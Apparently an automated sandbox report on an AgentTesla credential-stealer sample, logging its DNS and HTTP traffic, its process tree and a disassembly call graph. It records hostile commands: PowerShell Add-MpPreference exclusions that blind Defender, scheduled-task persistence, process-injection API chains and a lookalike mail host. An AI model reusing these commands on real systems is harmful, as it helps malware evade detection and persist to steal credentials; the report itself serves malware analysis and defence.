                                                            Jan 11, 2025 04:25:26.571656942 CET1.1.1.1192.168.2.80xaf51No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:25:26.571656942 CET1.1.1.1192.168.2.80xaf51No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:25:28.770808935 CET1.1.1.1192.168.2.80x4483No error (0)mail.iaa-airferight.com46.175.148.58A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:25:52.226701975 CET1.1.1.1192.168.2.80xbb98Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • api.ipify.org

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849707104.26.12.2054436784C:\Users\user\Desktop\jKqPSehspS.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-11 03:25:27 UTC155OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
                                                            2025-01-11 03:25:27 UTC424INHTTP/1.1 200 OK
                                                            Date: Sat, 11 Jan 2025 03:25:27 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 9001ccb5895e7289-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1819&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1596500&cwnd=238&unsent_bytes=0&cid=474d4a183d150a66&ts=249&x=0"
                                                            2025-01-11 03:25:27 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                            Data Ascii: 8.46.123.189


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849711104.26.12.2054437408C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-11 03:25:31 UTC155OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
                                                            2025-01-11 03:25:31 UTC424INHTTP/1.1 200 OK
                                                            Date: Sat, 11 Jan 2025 03:25:31 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 9001ccd24d228c3c-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1951&rtt_var=744&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1460000&cwnd=224&unsent_bytes=0&cid=2546c5f36ef920c3&ts=526&x=0"
                                                            2025-01-11 03:25:31 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                            Data Ascii: 8.46.123.189


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:22:25:20
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\jKqPSehspS.exe"
                                                            Imagebase:0xce0000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:22:25:22
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
                                                            Imagebase:0xc70000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:22:25:22
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
                                                            Imagebase:0xc70000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"
                                                            Imagebase:0xb90000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:22:25:24
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\jKqPSehspS.exe"
                                                            Imagebase:0xa90000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:10
                                                            Start time:22:25:25
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            Imagebase:0x390000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 91%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:22:25:26
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff605670000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:22:25:28
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"
                                                            Imagebase:0xb90000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:22:25:28
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:22:25:29
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\BLpvFR.exe"
                                                            Imagebase:0x980000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:245
                                                              Total number of Limit Nodes:11
                                                              execution_graph 24129 79474a4 24130 794748c 24129->24130 24131 794749b 24130->24131 24132 7949a96 13 API calls 24130->24132 24133 7949a30 13 API calls 24130->24133 24134 7949a20 13 API calls 24130->24134 24131->24131 24132->24130 24133->24130 24134->24130 23909 7947653 23910 794748c 23909->23910 23911 794749b 23910->23911 23915 7949a96 23910->23915 23934 7949a20 23910->23934 23952 7949a30 23910->23952 23911->23911 23916 7949a24 23915->23916 23918 7949a99 23915->23918 23970 794a1d5 23916->23970 23975 7949f2b 23916->23975 23983 794a169 23916->23983 23990 7949eef 23916->23990 23994 794a42e 23916->23994 23999 7949fe2 23916->23999 24007 794a3c1 23916->24007 24012 794a300 23916->24012 24016 794a0e5 23916->24016 24024 794a7e5 23916->24024 24029 7949f5b 23916->24029 24033 794a3df 23916->24033 24037 7949f13 23916->24037 24042 7949e92 23916->24042 24048 794a456 23916->24048 23917 7949a52 23917->23910 23918->23910 23935 7949a30 23934->23935 23937 794a1d5 2 API calls 23935->23937 23938 794a456 2 API calls 23935->23938 23939 7949e92 4 API calls 23935->23939 23940 7949f13 3 API calls 23935->23940 23941 794a3df 2 API calls 23935->23941 23942 7949f5b 2 API calls 23935->23942 23943 794a7e5 2 API calls 23935->23943 23944 794a0e5 5 API calls 23935->23944 23945 794a300 2 API calls 23935->23945 23946 794a3c1 3 API calls 23935->23946 23947 7949fe2 2 API calls 23935->23947 23948 794a42e 2 API calls 23935->23948 23949 7949eef 2 API calls 23935->23949 23950 794a169 4 API calls 23935->23950 23951 7949f2b 2 API calls 23935->23951 23936 7949a52 23936->23910 23937->23936 23938->23936 23939->23936 23940->23936 23941->23936 23942->23936 23943->23936 23944->23936 23945->23936 23946->23936 23947->23936 23948->23936 23949->23936 23950->23936 23951->23936 23953 7949a4a 23952->23953 23955 794a1d5 2 API calls 23953->23955 23956 794a456 2 API calls 23953->23956 23957 7949e92 4 API calls 23953->23957 23958 7949f13 3 API calls 23953->23958 23959 794a3df 2 API calls 23953->23959 23960 7949f5b 2 API calls 23953->23960 23961 794a7e5 2 API calls 23953->23961 23962 794a0e5 5 API calls 23953->23962 23963 794a300 2 API calls 23953->23963 23964 794a3c1 3 API calls 23953->23964 23965 7949fe2 2 API calls 23953->23965 23966 794a42e 2 API calls 23953->23966 23967 7949eef 2 API calls 23953->23967 23968 794a169 4 API calls 23953->23968 23969 7949f2b 2 API calls 23953->23969 23954 7949a52 23954->23910 23955->23954 23956->23954 23957->23954 23958->23954 23959->23954 23960->23954 23961->23954 23962->23954 23963->23954 23964->23954 23965->23954 23966->23954 23967->23954 23968->23954 23969->23954 23971 794a1db 23970->23971 24053 7946de0 23971->24053 24057 7946de8 23971->24057 23972 794a076 23972->23917 23977 7949f32 23975->23977 23976 794a7c6 23977->23917 23977->23976 23978 7949efb 23977->23978 23979 7946de0 WriteProcessMemory 23977->23979 23980 7946de8 WriteProcessMemory 23977->23980 23981 7946de0 WriteProcessMemory 23978->23981 23982 7946de8 WriteProcessMemory 23978->23982 23979->23977 23980->23977 23981->23978 23982->23978 24061 7946c50 23983->24061 24065 7946c49 23983->24065 23984 794a1cf 23985 7949efb 23985->23984 23986 7946de0 WriteProcessMemory 23985->23986 23987 7946de8 WriteProcessMemory 23985->23987 23986->23985 23987->23985 23991 7949efb 23990->23991 23992 7946de0 WriteProcessMemory 23991->23992 23993 7946de8 WriteProcessMemory 23991->23993 23992->23991 23993->23991 23995 794a1ec 23994->23995 23996 794a076 23995->23996 23997 7946de0 WriteProcessMemory 23995->23997 23998 7946de8 WriteProcessMemory 23995->23998 23996->23917 23997->23996 23998->23996 24001 7949f32 23999->24001 24000 794a7c6 24001->23917 24001->24000 24002 7949efb 24001->24002 24003 7946de0 WriteProcessMemory 24001->24003 24004 7946de8 WriteProcessMemory 24001->24004 24005 7946de0 WriteProcessMemory 24002->24005 24006 7946de8 WriteProcessMemory 24002->24006 24003->24001 24004->24001 24005->24002 24006->24002 24008 794a34f 24007->24008 24008->24007 24069 7946791 24008->24069 24073 7946798 24008->24073 24077 794683f 24008->24077 24081 7946d20 24012->24081 24085 7946d28 24012->24085 24013 794a322 24013->23917 24089 794abf8 24016->24089 24094 794abe9 24016->24094 24017 794a7d9 24018 794a102 24018->24017 24021 7946791 ResumeThread 24018->24021 24022 794683f ResumeThread 24018->24022 24023 7946798 ResumeThread 24018->24023 24021->24018 24022->24018 24023->24018 24099 7946ed0 24024->24099 24103 7946ed8 24024->24103 24025 794a29e 24025->24024 24026 794a854 24025->24026 24026->23917 24030 7949efb 24029->24030 24031 7946de0 WriteProcessMemory 24030->24031 24032 7946de8 WriteProcessMemory 24030->24032 24031->24030 24032->24030 24034 7949efb 24033->24034 24035 7946de0 WriteProcessMemory 24034->24035 24036 7946de8 WriteProcessMemory 24034->24036 24035->24034 24036->24034 24038 7949f20 24037->24038 24039 7946791 ResumeThread 24038->24039 24040 794683f ResumeThread 24038->24040 24041 7946798 ResumeThread 24038->24041 24039->24038 24040->24038 24041->24038 24107 7947070 24042->24107 24111 7947068 24042->24111 24049 794a45a 24048->24049 24050 7949efb 24048->24050 24049->23917 24051 7946de0 WriteProcessMemory 24050->24051 24052 7946de8 WriteProcessMemory 24050->24052 24051->24050 24052->24050 24054 7946de8 WriteProcessMemory 24053->24054 24056 7946e87 24054->24056 24056->23972 24058 7946e30 WriteProcessMemory 24057->24058 24060 7946e87 24058->24060 24060->23972 24062 7946c95 Wow64SetThreadContext 24061->24062 24064 7946cdd 24062->24064 24064->23985 24066 7946c50 Wow64SetThreadContext 24065->24066 24068 7946cdd 24066->24068 24068->23985 24070 7946798 ResumeThread 24069->24070 24072 7946809 24070->24072 24072->24008 24074 79467d8 ResumeThread 24073->24074 24076 7946809 24074->24076 24076->24008 24078 79467e0 ResumeThread 24077->24078 24080 7946809 24078->24080 24080->24008 24082 7946d68 VirtualAllocEx 24081->24082 24084 7946da5 24082->24084 24084->24013 24086 7946d68 VirtualAllocEx 24085->24086 24088 7946da5 24086->24088 24088->24013 24090 794ac0d 24089->24090 24092 7946c50 Wow64SetThreadContext 24090->24092 24093 7946c49 Wow64SetThreadContext 24090->24093 24091 794ac23 24091->24018 24092->24091 24093->24091 24095 794ac0d 24094->24095 24097 7946c50 Wow64SetThreadContext 24095->24097 24098 7946c49 Wow64SetThreadContext 24095->24098 24096 794ac23 24096->24018 24097->24096 24098->24096 24100 7946ed8 ReadProcessMemory 24099->24100 24102 7946f67 24100->24102 24102->24025 24104 7946f23 ReadProcessMemory 24103->24104 24106 7946f67 24104->24106 24106->24025 24108 79470f9 CreateProcessA 24107->24108 24110 79472bb 24108->24110 24112 7947070 CreateProcessA 24111->24112 24114 79472bb 24112->24114 24115 150d358 24116 150d39e 24115->24116 24120 150d538 24116->24120 24123 150d528 24116->24123 24117 150d48b 24126 150cc40 24120->24126 24124 150d566 24123->24124 24125 150cc40 DuplicateHandle 24123->24125 24124->24117 24125->24124 24127 150d5a0 DuplicateHandle 24126->24127 24128 150d566 24127->24128 24128->24117 24135 1504668 24136 1504672 24135->24136 24140 1504758 24135->24140 24145 1503e34 24136->24145 24138 150468d 24141 1504765 24140->24141 24149 1504868 24141->24149 24153 1504858 24141->24153 24146 1503e3f 24145->24146 24161 1505d24 24146->24161 24148 1506f8f 24148->24138 24150 150488f 24149->24150 24151 150496c 24150->24151 24157 15044b4 24150->24157 24154 1504868 24153->24154 24155 15044b4 CreateActCtxA 24154->24155 24156 150496c 24154->24156 24155->24156 24158 15058f8 CreateActCtxA 24157->24158 24160 15059bb 24158->24160 24162 1505d2f 24161->24162 24165 1505da4 24162->24165 24164 15071bd 24164->24148 24166 1505daf 24165->24166 24169 1505dd4 24166->24169 24168 150729a 24168->24164 24170 1505ddf 24169->24170 24173 1505df4 24170->24173 24172 150738d 24172->24168 24174 1505dff 24173->24174 24176 15088eb 24174->24176 24180 150afa0 24174->24180 24175 1508929 24175->24172 24176->24175 24184 150d080 24176->24184 24189 150d090 24176->24189 24194 150afd8 24180->24194 24197 150afc8 24180->24197 24181 150afb6 24181->24176 24185 150d0b1 24184->24185 24186 150d0d5 24185->24186 24206 150d240 24185->24206 24210 150d22f 24185->24210 24186->24175 24190 150d0b1 24189->24190 24191 150d0d5 24190->24191 24192 150d240 GetModuleHandleW 24190->24192 24193 150d22f GetModuleHandleW 24190->24193 24191->24175 24192->24191 24193->24191 24201 150b0d0 24194->24201 24195 150afe7 24195->24181 24198 150afd8 24197->24198 24200 150b0d0 GetModuleHandleW 24198->24200 24199 150afe7 24199->24181 24200->24199 24202 150b104 24201->24202 24203 150b0e1 24201->24203 24202->24195 24203->24202 24204 150b308 GetModuleHandleW 24203->24204 24205 150b335 24204->24205 24205->24195 24207 150d24d 24206->24207 24208 150d287 24207->24208 24214 150cb78 24207->24214 24208->24186 24211 150d24d 24210->24211 24212 150d287 24211->24212 24213 150cb78 GetModuleHandleW 24211->24213 24212->24186 24213->24212 24215 150cb83 24214->24215 24217 150db98 24215->24217 24218 150cca4 24215->24218 24217->24217 24219 150ccaf 24218->24219 24220 1505df4 GetModuleHandleW 24219->24220 24221 150dc07 24220->24221 24221->24217 24222 794ac68 24223 794adf3 24222->24223 24225 794ac8e 24222->24225 24225->24223 24226 794693c 24225->24226 24227 794aee8 PostMessageW 24226->24227 24228 794af54 24227->24228 24228->24225

                                                              Executed Functions

                                                              Function 07947068 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7947068-7947105 3 7947107-7947111 0->3 4 794713e-794715e 0->4 3->4 5 7947113-7947115 3->5 11 7947197-79471c6 4->11 12 7947160-794716a 4->12 7 7947117-7947121 5->7 8 7947138-794713b 5->8 9 7947125-7947134 7->9 10 7947123 7->10 8->4 9->9 13 7947136 9->13 10->9 18 79471ff-79472b9 CreateProcessA 11->18 19 79471c8-79471d2 11->19 12->11 14 794716c-794716e 12->14 13->8 16 7947170-794717a 14->16 17 7947191-7947194 14->17 20 794717c 16->20 21 794717e-794718d 16->21 17->11 32 79472c2-7947348 18->32 33 79472bb-79472c1 18->33 19->18 22 79471d4-79471d6 19->22 20->21 21->21 23 794718f 21->23 24 79471d8-79471e2 22->24 25 79471f9-79471fc 22->25 23->17 27 79471e4 24->27 28 79471e6-79471f5 24->28 25->18 27->28 28->28 29 79471f7 28->29 29->25 43 7947358-794735c 32->43 44 794734a-794734e 32->44 33->32 46 794736c-7947370 43->46 47 794735e-7947362 43->47 44->43 45 7947350 44->45 45->43 48 7947380-7947384 46->48 49 7947372-7947376 46->49 47->46 50 7947364 47->50 52 7947396-794739d 48->52 53 7947386-794738c 48->53 49->48 51 7947378 49->51 50->46 51->48 54 79473b4 52->54 55 794739f-79473ae 52->55 53->52 57 79473b5 54->57 55->54 57->57
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079472A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 1e4325e7655c4c7ad10781e0b0c38e649d2697b41385712ff2b5bbbb7c11e894
                                                              • Instruction ID: da1a4c29bb55d9e883d207111be97023848cba495670f671d3c796e1f12007a9
                                                              • Opcode Fuzzy Hash: 1e4325e7655c4c7ad10781e0b0c38e649d2697b41385712ff2b5bbbb7c11e894
                                                              • Instruction Fuzzy Hash: 7C914CB1D0031ADFEB24DFA8CC41BDDBBB6BB48314F1485A9D808A7280DB759985CF91
                                                              Function 07947070 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 58 7947070-7947105 60 7947107-7947111 58->60 61 794713e-794715e 58->61 60->61 62 7947113-7947115 60->62 68 7947197-79471c6 61->68 69 7947160-794716a 61->69 64 7947117-7947121 62->64 65 7947138-794713b 62->65 66 7947125-7947134 64->66 67 7947123 64->67 65->61 66->66 70 7947136 66->70 67->66 75 79471ff-79472b9 CreateProcessA 68->75 76 79471c8-79471d2 68->76 69->68 71 794716c-794716e 69->71 70->65 73 7947170-794717a 71->73 74 7947191-7947194 71->74 77 794717c 73->77 78 794717e-794718d 73->78 74->68 89 79472c2-7947348 75->89 90 79472bb-79472c1 75->90 76->75 79 79471d4-79471d6 76->79 77->78 78->78 80 794718f 78->80 81 79471d8-79471e2 79->81 82 79471f9-79471fc 79->82 80->74 84 79471e4 81->84 85 79471e6-79471f5 81->85 82->75 84->85 85->85 86 79471f7 85->86 86->82 100 7947358-794735c 89->100 101 794734a-794734e 89->101 90->89 103 794736c-7947370 100->103 104 794735e-7947362 100->104 101->100 102 7947350 101->102 102->100 105 7947380-7947384 103->105 106 7947372-7947376 103->106 104->103 107 7947364 104->107 109 7947396-794739d 105->109 110 7947386-794738c 105->110 106->105 108 7947378 106->108 107->103 108->105 111 79473b4 109->111 112 794739f-79473ae 109->112 110->109 114 79473b5 111->114 112->111 114->114
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079472A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: ab27eba216825dcc0fe95ef6d9752c645f884a8a00c66bcbad0c2a2eb6b7d101
                                                              • Instruction ID: dbde1f3bf1f949ef734a536a259be78dec2470dc7fb0170d75e8a6fde65239b1
                                                              • Opcode Fuzzy Hash: ab27eba216825dcc0fe95ef6d9752c645f884a8a00c66bcbad0c2a2eb6b7d101
                                                              • Instruction Fuzzy Hash: C2913CB1D0071ADFEB24CFA8C841BDDBBB6BB48314F1485A9D808A7280DB759985CF91
                                                              Function 0150B0D0 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 115 150b0d0-150b0df 116 150b0e1-150b0ee call 1509ad4 115->116 117 150b10b-150b10f 115->117 124 150b0f0 116->124 125 150b104 116->125 118 150b111-150b11b 117->118 119 150b123-150b164 117->119 118->119 126 150b171-150b17f 119->126 127 150b166-150b16e 119->127 170 150b0f6 call 150b358 124->170 171 150b0f6 call 150b368 124->171 125->117 128 150b181-150b186 126->128 129 150b1a3-150b1a5 126->129 127->126 132 150b191 128->132 133 150b188-150b18f call 150aab4 128->133 131 150b1a8-150b1af 129->131 130 150b0fc-150b0fe 130->125 134 150b240-150b300 130->134 135 150b1b1-150b1b9 131->135 136 150b1bc-150b1c3 131->136 138 150b193-150b1a1 132->138 133->138 165 150b302-150b305 134->165 166 150b308-150b333 GetModuleHandleW 134->166 135->136 139 150b1d0-150b1d9 call 150aac4 136->139 140 150b1c5-150b1cd 136->140 138->131 146 150b1e6-150b1eb 139->146 147 150b1db-150b1e3 139->147 140->139 148 150b209-150b216 146->148 149 150b1ed-150b1f4 146->149 147->146 155 150b218-150b236 148->155 156 150b239-150b23f 148->156 149->148 151 150b1f6-150b206 call 150aad4 call 150aae4 149->151 151->148 155->156 165->166 167 150b335-150b33b 166->167 168 150b33c-150b350 166->168 167->168 170->130 171->130
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0150B326
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: a5f6f1bacfea429dcc286d593b5d437ad97b4e9b59bdcbd680acfcb85ab6fe43
                                                              • Instruction ID: 857652ef3b495040d0a9f25448bd821420d2bcdca7f5b87edbb1b1d21e61237c
                                                              • Opcode Fuzzy Hash: a5f6f1bacfea429dcc286d593b5d437ad97b4e9b59bdcbd680acfcb85ab6fe43
